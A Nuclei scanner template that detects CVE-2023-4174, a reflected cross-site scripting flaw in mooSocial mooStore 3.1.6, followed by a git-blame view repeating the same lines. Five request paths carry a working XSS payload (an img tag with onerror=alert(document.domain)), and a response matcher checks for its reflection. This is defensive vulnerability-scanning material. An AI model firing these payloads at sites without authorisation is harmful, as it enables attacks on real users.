nuclei-templates/http/cves/2023/CVE-2023-4174.yaml

id: CVE-2023-4174

info:
  name: mooSocial 3.1.6 - Reflected Cross Site Scripting
  author: momika233
  severity: medium
  description: |
    A vulnerability has been found in mooSocial mooStore 3.1.6 and classified as problematic. Affected by this vulnerability is an unknown functionality. The manipulation leads to cross site scripting. The attack can be launched remotely.
  remediation: |
    Upgrade to the latest version of mooSocial or apply the vendor-provided patch to fix the XSS vulnerability.
  reference:
    - https://www.exploit-db.com/exploits/51671
    - https://nvd.nist.gov/vuln/detail/CVE-2023-4174
    - https://packetstormsecurity.com/files/174017/Social-Commerce-3.1.6-Cross-Site-Scripting.html
    - https://vuldb.com/?ctiid.236209
    - https://vuldb.com/?id.236209
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2023-4174
    cwe-id: CWE-79
    epss-score: 0.00209
    epss-percentile: 0.58775
    cpe: cpe:2.3:a:moosocial:moostore:3.1.6:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 5
    vendor: moosocial
    product: moostore
    fofa-query: icon_hash="702863115"
  tags: packetstorm,cve,cve2023,moosocial,xss

http:
  - method: GET
    path:
      - '{{BaseURL}}/search/index?q="><img+src=a+onerror=alert(document.domain)>ridxm'
      - '{{BaseURL}}/stores"><img+src=a+onerror=alert(document.domain)>ridxm/all-products?store_id=&keyword=&price_from=&price_to=&rating=&store_category_id=&sortby=most_recent'
      - '{{BaseURL}}/user_info"><img+src=a+onerror=alert(document.domain)>ridxm/index/friends'
      - '{{BaseURL}}/faqs"><img+src=a+onerror=alert(document.domain)>ridxm/index?content_search="><img+src=a+onerror=alert(document.domain)>ridxm'
      - '{{BaseURL}}/classifieds"><img+src=a+onerror=alert(document.domain)>ridxm/search?category=1'

    stop-at-first-match: true

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "<img src=a onerror=alert(document.domain)>ridxm"
          - "mooSocial"
        condition: and

      - type: word
        part: header
        words:
          - "text/html"

# digest: 4b0a004830460221009bd854615bd46dcab46fc8ad4935807bc819d657e05936e9ea1ccc770da02c9402210098058e658361119a1ecc32ca3f40dd1d34abb4d2a4d64055746dba722a21d6e7:922c64590222798bb761d5b6d8e72950
re-wrote template 2023-08-08 21:02:42 +00:00			`id: CVE-2023-4174`

			`info:`
			`name: mooSocial 3.1.6 - Reflected Cross Site Scripting`
			`author: momika233`
			`severity: medium`
			`description: \|`
			`A vulnerability has been found in mooSocial mooStore 3.1.6 and classified as problematic. Affected by this vulnerability is an unknown functionality. The manipulation leads to cross site scripting. The attack can be launched remotely.`
updated remediation in 2023 CVEs 2023-09-06 11:43:37 +00:00			`remediation: \|`
			`Upgrade to the latest version of mooSocial or apply the vendor-provided patch to fix the XSS vulnerability.`
re-wrote template 2023-08-08 21:02:42 +00:00			`reference:`
			`- https://www.exploit-db.com/exploits/51671`
			`- https://nvd.nist.gov/vuln/detail/CVE-2023-4174`
			`- https://packetstormsecurity.com/files/174017/Social-Commerce-3.1.6-Cross-Site-Scripting.html`
Added EPSS Percentile 2023-08-31 11:46:18 +00:00			`- https://vuldb.com/?ctiid.236209`
			`- https://vuldb.com/?id.236209`
			`classification:`
			`cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N`
			`cvss-score: 6.1`
			`cve-id: CVE-2023-4174`
			`cwe-id: CWE-79`
			`epss-score: 0.00209`
TemplateMan Update [Sun Nov 5 22:23:39 UTC 2023] :robot: 2023-11-05 22:23:39 +00:00			`epss-percentile: 0.58775`
updated remediation in 2023 CVEs 2023-09-06 11:43:37 +00:00			`cpe: cpe:2.3:a:moosocial:moostore:3.1.6:::::::*`
re-wrote template 2023-08-08 21:02:42 +00:00			`metadata:`
			`verified: true`
updated remediation in 2023 CVEs 2023-09-06 11:43:37 +00:00			`max-request: 5`
Added EPSS Percentile 2023-08-31 11:46:18 +00:00			`vendor: moosocial`
			`product: moostore`
updated remediation in 2023 CVEs 2023-09-06 11:43:37 +00:00			`fofa-query: icon_hash="702863115"`
Added EPSS Percentile 2023-08-31 11:46:18 +00:00			`tags: packetstorm,cve,cve2023,moosocial,xss`
re-wrote template 2023-08-08 21:02:42 +00:00
			`http:`
			`- method: GET`
			`path:`
			`- '{{BaseURL}}/search/index?q="><img+src=a+onerror=alert(document.domain)>ridxm'`
			`- '{{BaseURL}}/stores"><img+src=a+onerror=alert(document.domain)>ridxm/all-products?store_id=&keyword=&price_from=&price_to=&rating=&store_category_id=&sortby=most_recent'`
			`- '{{BaseURL}}/user_info"><img+src=a+onerror=alert(document.domain)>ridxm/index/friends'`
			`- '{{BaseURL}}/faqs"><img+src=a+onerror=alert(document.domain)>ridxm/index?content_search="><img+src=a+onerror=alert(document.domain)>ridxm'`
			`- '{{BaseURL}}/classifieds"><img+src=a+onerror=alert(document.domain)>ridxm/search?category=1'`

			`stop-at-first-match: true`
Added EPSS Percentile 2023-08-31 11:46:18 +00:00
re-wrote template 2023-08-08 21:02:42 +00:00			`matchers-condition: and`
			`matchers:`
			`- type: word`
			`part: body`
			`words:`
			`- "<img src=a onerror=alert(document.domain)>ridxm"`
			`- "mooSocial"`
			`condition: and`

			`- type: word`
			`part: header`
			`words:`
Added EPSS Percentile 2023-08-31 11:46:18 +00:00			`- "text/html"`
TemplateMan Update [Sun Nov 5 22:23:39 UTC 2023] :robot: 2023-11-05 22:23:39 +00:00
			`# digest: 4b0a004830460221009bd854615bd46dcab46fc8ad4935807bc819d657e05936e9ea1ccc770da02c9402210098058e658361119a1ecc32ca3f40dd1d34abb4d2a4d64055746dba722a21d6e7:922c64590222798bb761d5b6d8e72950`